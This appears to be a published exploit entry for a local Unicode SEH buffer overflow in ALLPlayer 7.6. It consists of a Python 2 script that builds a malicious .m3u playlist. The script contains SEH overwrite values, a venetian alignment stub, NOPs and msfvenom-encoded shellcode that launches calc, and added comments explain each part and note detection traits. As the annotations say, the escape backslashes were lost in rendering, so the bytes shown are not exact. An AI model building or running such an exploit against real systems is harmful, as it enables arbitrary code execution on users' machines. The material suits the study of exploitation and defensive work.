


ALLPlayer 7.6 Buffer Overflow ↭



# Exploit Title: ALLPlayer v7.6 Local Buffer Overflow (SEH)(Unicode)
# Version: 7.6
# Date: 20-04-2020
# Exploit Author: Xenofon Vassilakopoulos
# Tested on: Windows 7 Home Premium SP1 x86

# Steps to reproduce :
# 1. generate the test.m3u using this exploit
# 2. open ALLPlayer then go to Open audio file
# 3. load the test.m3u file
# 4. calc

# Proof-of-concept generator for the advisory above.  It writes one .m3u
# playlist whose only entry is an 'http://' URL of 5000 bytes; the advisory
# header attributes the crash to a (Unicode) SEH overwrite when ALLPlayer 7.6
# parses that entry.  As written the script is Python 2 (print statement,
# str + bytes concatenation), and as rendered on this page the backslashes of
# every escape sequence have been lost ("x61" rather than a byte escape), so
# the listing is not byte-for-byte what the author ran.
filename = "test.m3u"

# 301 filler bytes up to the exception-handler record (offset per the author).
junk="A"*301

# Overwritten SEH record, given as two-byte values because the advisory
# describes a Unicode overflow (the buffer is widened before it is copied).
nseh = "x61x6e" # popad align
seh = "x12x74" # pop ebx # pop ebp # ret 0x04

# Alignment stub.  The author labels the interleaved 0x6e bytes "venetian
# shellcode": the Unicode widening inserts zero bytes, and the stub is written
# so those zeros are tolerated.  Net effect visible below: EAX is derived from
# ESI (add 0x11001900, sub 0x11001600), pushed, and returned into.
align=("x56" # push esi
"x6e" # venetian shellcode
"x58" # pop eax
"x6e" # venetian shellcode
"x05x19x11" # add eax,0x11001900
"x6e" # venetian shellcode
"x2dx16x11" # sub eax,0x11001600
"x6e" # venetian shellcode
"x50" # push eax
"x6e" # venetian shellcode
"xc3" # retn
)





# 45 NOP bytes placed between the alignment stub and the encoded payload.
nop="x90"*45

# Encoded payload as emitted by msfvenom (command below): windows/exec running
# calc — the "calc" of step 4 in the header — through the x86/unicode_mixed
# encoder, which expects EAX to point at the payload (BufferRegister=EAX).
# msfvenom -p windows/exec CMD=calc -e x86/unicode_mixed BufferRegister=EAX -f python
shellcode= b""
shellcode+= b"x50x50x59x41x49x41x49x41x49x41x49x41x49"
shellcode+= b"x41x49x41x49x41x49x41x49x41x49x41x49x41"
shellcode+= b"x49x41x49x41x49x41x6ax58x41x51x41x44x41"
shellcode+= b"x5ax41x42x41x52x41x4cx41x59x41x49x41x51"
shellcode+= b"x41x49x41x51x41x49x41x68x41x41x41x5ax31"
shellcode+= b"x41x49x41x49x41x4ax31x31x41x49x41x49x41"
shellcode+= b"x42x41x42x41x42x51x49x31x41x49x51x49x41"
shellcode+= b"x49x51x49x31x31x31x41x49x41x4ax51x59x41"
shellcode+= b"x5ax42x41x42x41x42x41x42x41x42x6bx4dx41"
shellcode+= b"x47x42x39x75x34x4ax42x79x6cx69x58x62x62"
shellcode+= b"x49x70x69x70x4dx30x71x50x63x59x48x65x6e"
shellcode+= b"x51x57x50x52x44x54x4bx32x30x6ex50x54x4b"
shellcode+= b"x72x32x6ax6cx54x4bx70x52x6dx44x72x6bx61"
shellcode+= b"x62x6fx38x4ax6fx45x67x4ex6ax6dx56x4dx61"
shellcode+= b"x69x6fx34x6cx4fx4cx51x51x53x4cx79x72x4c"
shellcode+= b"x6cx6dx50x66x61x58x4fx4cx4dx59x71x67x57"
shellcode+= b"x38x62x39x62x62x32x6ex77x74x4bx4ex72x4c"
shellcode+= b"x50x34x4bx50x4ax4fx4cx72x6bx30x4cx4ex31"
shellcode+= b"x51x68x38x63x61x38x79x71x36x71x70x51x62"
shellcode+= b"x6bx71x49x6bx70x69x71x66x73x54x4bx31x39"
shellcode+= b"x6cx58x37x73x6ex5ax6ex69x32x6bx6ex54x64"
shellcode+= b"x4bx5ax61x59x46x50x31x49x6fx74x6cx69x31"
shellcode+= b"x48x4fx6ax6dx7ax61x59x37x70x38x59x50x61"
shellcode+= b"x65x4ax56x4cx43x71x6dx4cx38x6dx6bx43x4d"
shellcode+= b"x4fx34x42x55x67x74x31x48x44x4bx32x38x4c"
shellcode+= b"x64x6bx51x5ax33x61x56x62x6bx6cx4cx6ex6b"
shellcode+= b"x44x4bx6fx68x4bx6cx7ax61x6ax33x64x4bx6b"
shellcode+= b"x54x52x6bx49x71x36x70x42x69x4ex64x6bx74"
shellcode+= b"x6fx34x6fx6bx61x4bx51x51x72x39x4fx6ax4f"
shellcode+= b"x61x59x6fx47x70x71x4fx4fx6fx4ex7ax32x6b"
shellcode+= b"x6ex32x4ax4bx52x6dx61x4dx72x4ax6ax61x32"
shellcode+= b"x6dx42x65x75x62x49x70x79x70x4bx50x62x30"
shellcode+= b"x52x48x4dx61x72x6bx42x4fx35x37x49x6fx4a"
shellcode+= b"x35x37x4bx6cx30x64x75x53x72x61x46x31x58"
shellcode+= b"x45x56x56x35x45x6dx33x6dx49x6fx59x45x4f"
shellcode+= b"x4cx59x76x73x4cx6ax6ax75x30x69x6bx47x70"
shellcode+= b"x30x75x7ax65x35x6bx4ex67x7ax73x50x72x52"
shellcode+= b"x4fx6fx7ax69x70x30x53x49x6fx6ax35x51x53"
shellcode+= b"x70x61x32x4cx6fx73x49x70x41x41"

# Order on the line: filler, nSEH, SEH, alignment stub, NOPs, payload.
# (str and bytes are concatenated here, which only works under Python 2.)
payload=junk+nseh+seh+align+nop+shellcode

# Pad with 'D' to a fixed 5000-byte line regardless of the payload length.
fill="D"*(5000-len(payload))

payload+=fill
# The single playlist entry is 'http://' + payload, written without a newline.
# The byte count printed is len(payload) (5000) and excludes the 7-byte
# 'http://' prefix, so the file is 5007 bytes.
f=open(filename,"wb")
f.write('http://'+payload)
print "nFile created with %d bytes" % len(payload)
f.close()
# NOTE(review): from a detection standpoint the artifact is distinctive — a
# playlist whose single 'http://' line is ~5 KB of mostly repeated 'A'/'D'
# characters with a Unicode-encoder stub in the middle.  Whether the crashing
# module opts into SafeSEH/SEHOP and DEP, which target exactly this
# SEH-overwrite class, is not shown on this page.




